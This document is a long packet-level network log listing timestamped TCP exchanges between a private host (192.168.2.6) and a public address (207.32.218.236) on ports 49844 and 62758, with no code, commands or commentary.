Jan 2, 2022 02:28:34.747332096 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747368097 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747406960 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747443914 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747482061 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747522116 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747559071 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747596979 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747601986 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.747634888 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747638941 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.747646093 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.747649908 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.747653961 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.747673035 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747709990 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747747898 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747783899 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.747786045 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747795105 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.747826099 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747862101 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747900963 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747939110 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747976065 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.748013973 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.748053074 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.748090982 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.748120070 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.748169899 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.748177052 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.748182058 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.748187065 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.748191118 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.748898029 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.748938084 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.748991013 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749047995 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749087095 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749125004 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749162912 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749197960 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749236107 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749273062 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749311924 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749350071 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749351025 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.749360085 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.749366045 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.749372005 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.749375105 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.749378920 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.749475002 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.912729979 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.912787914 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.912826061 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.912893057 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.912933111 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.912970066 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913008928 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913048983 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913084984 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913100004 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913122892 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913127899 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913132906 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913161993 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913198948 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913237095 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913275003 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913312912 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913331985 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913341045 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913347006 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913352966 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913388968 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913430929 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913470984 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913537025 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913573980 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913593054 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913599014 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913604021 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913611889 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913650990 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913688898 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913727999 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913764000 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913789988 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913815975 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913821936 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913826942 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.913827896 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913865089 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913902998 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.913964987 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914000988 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914062023 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914100885 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914114952 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914124012 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914130926 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914141893 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914201021 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914258003 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914283991 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914321899 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914377928 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914417982 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914431095 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914439917 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914444923 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914457083 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914494991 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914532900 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914571047 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914612055 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914649010 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914669991 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914676905 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914681911 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.914705038 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914745092 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914783001 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.914808035 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.916353941 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.916378021 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.079561949 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079615116 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079653978 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079691887 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079730988 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079766989 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079824924 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.079828978 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079849958 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.079855919 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.079869032 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079921007 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079958916 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.079998970 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080012083 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080018997 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080058098 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080095053 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080132961 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080171108 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080208063 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080246925 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080255032 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080261946 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080267906 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080285072 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080322981 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080363035 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080408096 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080425978 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080436945 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080446959 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080487013 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080523014 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080559969 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080578089 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080586910 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080599070 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080636024 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080694914 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080733061 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080787897 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080825090 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080837011 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080843925 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080848932 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.080894947 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080935955 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080976963 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.080976963 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.081015110 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081053972 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081079006 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.081091881 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081127882 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081141949 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.081154108 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081190109 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081228971 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081263065 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.081269026 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081290960 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.081305981 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081343889 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081366062 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.081382036 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081407070 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081445932 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081482887 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081521988 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081559896 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081583977 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.081614017 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.081623077 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.081629038 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.246539116 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246599913 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246639013 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246678114 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246716022 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246758938 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246800900 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246829987 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.246839046 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246876001 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246913910 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246952057 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.246989965 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247029066 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247051954 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247061014 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247065067 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247065067 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247103930 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247153044 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247343063 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247380972 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247420073 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247453928 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247458935 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247461081 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247466087 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247495890 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247534990 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247571945 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247610092 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247648001 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247669935 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247678041 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247684002 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247684956 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247723103 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247761011 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247786045 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247823954 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247860909 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247899055 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247915983 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247924089 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247927904 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.247937918 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.247973919 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248013020 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248049974 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248085976 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248122931 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248159885 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248194933 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.248198032 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248203993 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.248210907 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.248338938 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248430014 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.248490095 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248531103 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248532057 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.248569965 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248606920 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248644114 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248682022 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248719931 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248759031 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248783112 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.248806953 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.248816013 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.248821974 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.249326944 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.413700104 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.413758993 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.413800001 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.413840055 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.413877964 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.413942099 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.413983107 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414010048 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414021015 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414038897 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414061069 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414100885 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414138079 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414167881 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414171934 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414176941 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414215088 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414253950 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414294958 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414323092 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414325953 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414331913 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414371014 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414410114 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414447069 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414477110 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414499998 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414540052 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414577007 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414616108 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414653063 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414664030 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414669037 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414670944 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414691925 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414731026 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414767027 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414804935 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414844036 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414858103 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414860964 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414864063 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414879084 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414917946 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414956093 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.414994001 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.414994001 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415033102 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415036917 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.415071011 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415098906 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415137053 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415148020 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:35.415173054 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415211916 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415250063 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415287971 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415327072 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:35.415338993 CET	49844	62758	192.168.2.6	207.32.218.236
